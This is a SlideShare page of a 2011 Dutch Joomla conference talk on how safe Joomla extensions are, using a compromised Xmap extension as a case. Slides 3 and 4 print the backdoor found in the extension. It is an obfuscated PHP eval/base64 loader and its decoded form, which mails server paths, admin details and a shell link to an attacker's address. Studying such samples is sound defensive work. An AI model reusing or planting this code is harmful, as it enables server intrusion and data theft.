Jira ICT - How safe are Joomla! extenties #jd11nl

1,371 views

Published on

How safe are Joomla! extenties #jd11nl
Joomladagen NL 2011

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,371
On SlideShare
0
From Embeds
0
Number of Embeds
25
Actions
Shares
0
Downloads
10
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Jira ICT - How safe are Joomla! extenties #jd11nl

  1. 1. How save are Joomla extenties? @jd11nlHow safe are Joomla extenties? Case: Xmap By Ray BogmanJira ICT www.jira.nl - @jiraictYireo www.yireo.com - @yireo
  2. 2. How save are Joomla extenties? @jd11nlXmap jeopardized?
  3. 3. How save are Joomla extenties? @jd11nl Where are you jeopardized?install.xmap.phpslider.css.php<?php eval("?>".base64_decode("PD9waHANCiRraW1lPSJhbWVuc2VtaWhAZ21haWwuY29tIjsNCiRiYXNsaWs9IkVMX011SGFNTWVEIFNlcnZlciBBdmNpc2kgVjEuMCI7DQokRUxfTXVIYU1NZUQ9IkRvc3lhIFlvbHUgOiAiLiRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNlcnZlciBBZG1pbiA6ICIuJF9TRVJWRVJbJ1NFUlZFUl9BRE1JTiddLiJybiI7DQokRUxfTXVIYU1NZUQuPSJTZXJ2ZXIgaXNsZXRpbSBzaXN0ZW1pIDogIi4kX1NFUlZFUlsnU0VSVkVSX1NPRlRXQVJFJ10uInJuIjsNCiRFTF9NdUhhTU1lRC49IlNoZWxsIExpbmsgOiBodHRwOi8vIi4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUEhQX1NFTEYnXS4icm4iOw0KJEVMX011SGFNTWVELj0iQXZsYW5hbiBTaXRlIDogIiAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiJybiI7DQptYWlsKCRraW1lLCAkYmFzbGlrLCAkRUxfTXVIYU1NZUQpOw0KPz4=")); ?>
  4. 4. How save are Joomla extenties? @jd11nlNotifying the Hacker would be nice<?php$kime="amensemih@gmail.com";$baslik="EL_MuHaMMeD Server Avcisi V1.0";$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER[DOCUMENT_ROOT]."rn";$EL_MuHaMMeD.="Server Admin : ".$_SERVER[SERVER_ADMIN]."rn";$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER[SERVER_SOFTWARE]."rn";$EL_MuHaMMeD.="Shell Link : http://".$_SERVER[SERVER_NAME].$_SERVER[PHP_SELF]."rn";$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER[HTTP_HOST]."rn";mail($kime, $baslik, $EL_MuHaMMeD);?>
  5. 5. How save are Joomla extenties? @jd11nlSo whats next?
  6. 6. How save are Joomla extenties? @jd11nlIs there a backdoor?
  7. 7. How save are Joomla extenties? @jd11nlGet your Joomla! login for Free!
  8. 8. How save are Joomla extenties? @jd11nl _JEXEC or die•com_agora.php•com_eventlist.php•com_glossary.php•com_joomgallery.php•com_kunena.php defined( _JEXEC ) ordie( Restricted access. ); missing in current version
  9. 9. How save are Joomla extenties? @jd11nl Thank you ray@jira.nl #jiraict www.jira.nlhttp://www.slideshare.net/jiraicthttp://www.facebook.com/jiraict

×